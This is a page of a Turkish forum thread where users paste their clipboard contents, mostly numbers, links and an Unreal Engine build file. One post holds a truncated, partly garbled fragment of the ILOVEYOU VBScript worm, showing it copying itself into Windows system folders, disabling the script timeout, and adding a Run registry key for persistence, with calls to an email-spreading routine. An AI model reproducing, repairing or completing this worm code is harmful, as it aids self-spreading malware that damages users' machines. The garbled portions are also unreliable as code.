Şimdi Ara

evet beyler ctrl+v leri görelim... (7. sayfa)

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
3 Misafir - 3 Masaüstü
5 sn
140
Cevap
4
Favori
1.834
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: önceki 34567
Sayfaya Git
Git
Giriş
Mesaj
  • Ne zaman bu konuyu görüp ctrl+ v yapsam, ban yiyeceğim bir şey oluyor. Bu seferki sınırsız ban yedirtecek belki hayatımı karartacak türden.

    < Bu ileti mobil sürüm kullanılarak atıldı >
  • rem delete -pcas(-vbe)
    On es error -pc
    On error Next Pc Hack
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"




  • quote:

    Orijinalden alıntı: ZippoCH

    Ne zaman bu konuyu görüp ctrl+ v yapsam, ban yiyeceğim bir şey oluyor. Bu seferki sınırsız ban yedirtecek belki hayatımı karartacak türden.

    ne hocam hayatını karartacak kadar merak ettim? özelden atabilirmisin.

    < Bu ileti mini sürüm kullanılarak atıldı >
  • Bay Small B kullanıcısına yanıt
    Damien dizisi için başka bir sürüm için senkron yapıyordum.
  • 𐱅𐰇𐰼𐰛

    < Bu ileti mobil sürüm kullanılarak atıldı >
  • https://www.odungonder.com

    < Bu ileti mobil sürüm kullanılarak atıldı >
  • door_or_entrance_number
  • 105627616

    < Bu ileti mini sürüm kullanılarak atıldı >
  • Ban yemem inşallah.




    < Bu mesaj bu kişi tarafından değiştirildi NomadCRY -- 14 Nisan 2016; 3:03:20 >
  • TSH
  • 907791380293
  • Siyuleyta reis gitme şaka yaptım de çık bir yerden bambambam diye bağır reis...

    < Bu ileti mobil sürüm kullanılarak atıldı >
  • 2624008

    < Bu ileti mobil sürüm kullanılarak atıldı >
  • Piła
  • https://youtu.be/b9H7Q4vSbMo

    < Bu ileti mini sürüm kullanılarak atıldı >
  • RF220565262CN

    < Bu ileti mobil sürüm kullanılarak atıldı >
  • RAMİL SAFEROV
  • // Copyright 1998-2016 Epic Games, Inc. All Rights Reserved. 

    using UnrealBuildTool;
    using System.Collections.Generic;

    public class UE4GameTarget : TargetRules
    {
    public UE4GameTarget( TargetInfo Target )
    {
    Type = TargetType.Game;

    // Output to Engine/Binaries/<PLATFORM> even if built as monolithic
    bOutputToEngineBinaries = true;
    }

    public override bool GetSupportedPlatforms(ref List<UnrealTargetPlatform> OutPlatforms)
    {
    return UnrealBuildTool.UnrealBuildTool.GetAllPlatforms(ref OutPlatforms, false);
    }

    public override void SetupBinaries(
    TargetInfo Target,
    ref List<UEBuildBinaryConfiguration> OutBuildBinaryConfigurations,
    ref List<string> OutExtraModuleNames
    )
    {
    OutExtraModuleNames.Add("UE4Game");
    // this is important - for some reason achievements etc intertwined with the onlinesubsystem and they saved without using a fake OSS. :/
    if (Target.Platform == UnrealTargetPlatform.HTML5)
    {
    OutExtraModuleNames.Add("OnlineSubsystemNull");
    }
    }

    public override void SetupGlobalEnvironment(
    TargetInfo Target,
    ref LinkEnvironmentConfiguration OutLinkEnvironmentConfiguration,
    ref CPPEnvironmentConfiguration OutCPPEnvironmentConfiguration
    )
    {
    if (Target.Platform == UnrealTargetPlatform.IOS)
    {
    // to make World Explorers as small as possible we excluded some items from the engine.
    // uncomment below to make a smaller iOS build
    /*UEBuildConfiguration.bCompileRecast = false;
    UEBuildConfiguration.bCompileSpeedTree = false;
    UEBuildConfiguration.bCompileAPEX = false;
    UEBuildConfiguration.bCompileLeanAndMeanUE = true;
    UEBuildConfiguration.bCompilePhysXVehicle = false;
    UEBuildConfiguration.bCompileFreeType = false;
    UEBuildConfiguration.bCompileForSize = true;*/
    }
    }

    public override bool ShouldUseSharedBuildEnvironment(TargetInfo Target)
    {
    return true;
    }

    public override List<UnrealTargetPlatform> GUBP_GetPlatforms_MonolithicOnly(UnrealTargetPlatform HostPlatform)
    {
    List<UnrealTargetPlatform> Platforms = null;

    switch(HostPlatform)
    {
    case UnrealTargetPlatform.Mac:
    Platforms = new List<UnrealTargetPlatform> { HostPlatform, UnrealTargetPlatform.IOS };
    break;

    case UnrealTargetPlatform.Linux:
    Platforms = new List<UnrealTargetPlatform> { HostPlatform };
    break;

    case UnrealTargetPlatform.Win64:
    Platforms = new List<UnrealTargetPlatform> { HostPlatform, UnrealTargetPlatform.Win32, UnrealTargetPlatform.IOS, UnrealTargetPlatform.XboxOne, UnrealTargetPlatform.PS4, UnrealTargetPlatform.Android, UnrealTargetPlatform.Linux, UnrealTargetPlatform.HTML5 };
    break;

    default:
    Platforms = new List<UnrealTargetPlatform>();
    break;
    }

    return Platforms;
    }
    public override List<UnrealTargetConfiguration> GUBP_GetConfigs_MonolithicOnly(UnrealTargetPlatform HostPlatform, UnrealTargetPlatform Platform)
    {
    return new List<UnrealTargetConfiguration> { UnrealTargetConfiguration.Development, UnrealTargetConfiguration.Shipping, UnrealTargetConfiguration.Test };
    }
    public override List<UnrealTargetConfiguration> GUBP_GetConfigsForPrecompiledBuilds_MonolithicOnly(UnrealTargetPlatform HostPlatform, UnrealTargetPlatform Platform)
    {
    List<UnrealTargetConfiguration> Platforms = new List<UnrealTargetConfiguration>();
    if(HostPlatform == UnrealTargetPlatform.Mac)
    {
    if(Platform == UnrealTargetPlatform.Mac || Platform == UnrealTargetPlatform.IOS)
    {
    Platforms.Add(UnrealTargetConfiguration.Development);
    Platforms.Add(UnrealTargetConfiguration.Shipping);
    }
    }
    else if(HostPlatform == UnrealTargetPlatform.Win64)
    {
    if(Platform == UnrealTargetPlatform.Win32 || Platform == UnrealTargetPlatform.Win64 || Platform == UnrealTargetPlatform.Android || Platform == UnrealTargetPlatform.HTML5)
    {
    Platforms.Add(UnrealTargetConfiguration.Development);
    Platforms.Add(UnrealTargetConfiguration.Shipping);
    }
    }
    return Platforms;
    }
    public override bool GUBP_BuildWindowsXPMonolithics()
    {
    return true;
    }
    }


    (Yukarıdaki kodlarda değişikliğe gittim,çalışmayınca arkadaştan orjinallerini aldım )



    < Bu mesaj bu kişi tarafından değiştirildi ClimbDown -- 15 Nisan 2016; 0:01:29 >
    < Bu ileti tablet sürüm kullanılarak atıldı >




  • 
Sayfa: önceki 34567
Sayfaya Git
Git
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.